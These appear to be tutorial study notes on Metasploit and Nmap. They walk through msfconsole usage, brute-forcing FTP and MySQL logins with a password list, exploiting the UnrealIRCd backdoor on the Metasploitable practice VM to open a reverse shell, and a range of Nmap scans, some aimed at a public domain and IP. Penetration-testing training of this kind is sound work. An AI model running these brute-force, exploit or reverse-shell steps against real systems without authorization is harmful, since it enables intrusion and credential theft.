.idea/

Subproject commit a63fd53cd7cadc815a14169bd70b62352ab41c14

Metasploit Framework - program with a bunch of built in tools you use (comes with Kali)

- gather information about target

- scan for vulnerabilities

- perform exploits / write your own too

- This is a command line tool

Metasploit.com

http://www.rapid7.com/products/metasploit/

http://www.rapid7.com/products/metasploit/editions.jsp

- This is the company that maintains the core framework/all the exploits & tools

- Paid versions include GUI versions of the tools/reporting features/group collab/etc...

- Free and paid versions both use same core framework & tools (many people prefer CLI)

This is for people who want to check the security of their network or for penetration testers

You can not run exploits on a target/company without permission (you will go to jail)

--------------------

Metasploitable 2 - vulnerable test server we can use to practice on (you can run in VM)

http://sourceforge.net/projects/metasploitable/files/Metasploitable2/

Note: if database is not connected, before running msfconsole:

service postgresql start

service metasploit start

msfconsole

Metasploitable

msfadmin

msfadmin

--------------------

Applications > Exploitation Tools > Metasploit Framework

Note: if database is not connected, before running msfconsole:

service postgresql start

service metasploit start

msfconsole

- Overview -

Choose an exploit (tool/something you can do)

Set options

Run attack

We usually want to get shell

--------------------

Basic Usage

# help (available commands and description of what they are used for)

?

# show exploits

show exploits

# search for something

search mysql

# more info about exploit (gives quick overview/description)

info auxiliary/scanner/mysql/mysql_login

# when you are ready to use an exploit

use auxiliary/scanner/mysql/mysql_login

# we arent there yet so lets go back (exit this tool)

back

--------------------

Intelligence Gathering

# run a simple whois (btw always get whois domain privacy)

whois thenewboston.com

# get IP address

host thenewboston.com

# Scan ports (see whats running on the server)

nmap -F 54.186.250.79

--------------------

Find SSH Version

search ssh_verison

info auxiliary/scanner/ssh/ssh_version

use auxiliary/scanner/ssh/ssh_version

show options

set RHOSTS 54.186.250.79

show options

run

--------------------

Crack FTP Password

search ftp_login

info auxiliary/scanner/ftp/ftp_login

use auxiliary/scanner/ftp/ftp_login

# Set password list

set RHOSTS 192.168.80.135

set THREADS 30

set USERNAME msfadmin

set PASS_FILE /usr/share/wordlists/rockyou.txt

set PASS_FILE Desktop/passwords.txt

exploit

Ctrl + C (to stop early)

Desktop/passwords.txt

12345

123456

1234567

12345678

abc123

iloveyou

letmein

monkey

msfadmin

password

qwerty

test

--------------------

MySQL Login

use auxiliary/scanner/mysql/mysql_login

set RHOSTS 192.168.80.135

set BLANK_PASSWORDS true

set STOP_ON_SUCCESS true

# Set files

set PASS_FILE Desktop/passwords.txt

set USER_FILE Desktop/users.txt

exploit

--------------------

Get Backdoor

# Search for an exploit

search Unreal 3.2.1.8

# Get more information about an exploit

info exploit/unix/irc/unreal_ircd_3281_backdoor

use exploit/unix/irc/unreal_ircd_3281_backdoor

# set RHOST to Metasploitable IP

show options

set RHOST 198.222.222.2

show options

# set LHOST to Kali IP

show payloads

set payload cmd/unix/reverse

show options

set LHOST 198.115.120.2

# Make sure everything is setup and run exploit

show options

exploit

Notice it says that a session is opened, but then it just gives you a blinking cursor. You are actually sitting in a terminal shell with the target machine!

whoami

--------------------

Tool used to scan a network to discover devices, ports, and services that are running.

Awesome network security tool

----------

nmap thenewboston.com

nmap 54.186.250.79

This displays ports detected, states, and services associated with that port

----------

States

open - active and open to connections

closed - responds to probes but most likely no services running

filtered - usually means protected by firewall

unfiltered - Nmap cant determine whether its open or closed

----------

nmap 192.168.0.9 192.168.0.17 192.168.0.23

nmap 192.168.0.1-30

nmap 192.168.0.*

----------

cat targets.txt

- 54.186.250.79

- 192.168.0.3

nmap -iL targets.txt

----------

nmap -A 54.186.250.79

----------

nmap --traceroute thenewboston.com

This is useful when you have a slow connection and you want to figure out where the bottle neck is.

----------

OS and service detection

nmap -O thenewboston.com

nmap -sV thenewboston.com

----------

Port scanning options

There are 65,535 ports available and by default Nmap only scans the 1,000 most popular ones

nmap -F thenewboston.com

nmap -p 20-25,80,443 thenewboston.com

nmap -p http,mysql thenewboston.com

nmap -p- 192.068.0.1

nmap --open thenewboston.com

----------

nmap -F -oN Desktop/results.txt thenewboston.com

cat Desktop/results.txt

----------

nmap -v thenewboston.com

nmap --iflist

Subproject commit 4e8ae3b85b2157b280dec0127129937a2ced21d4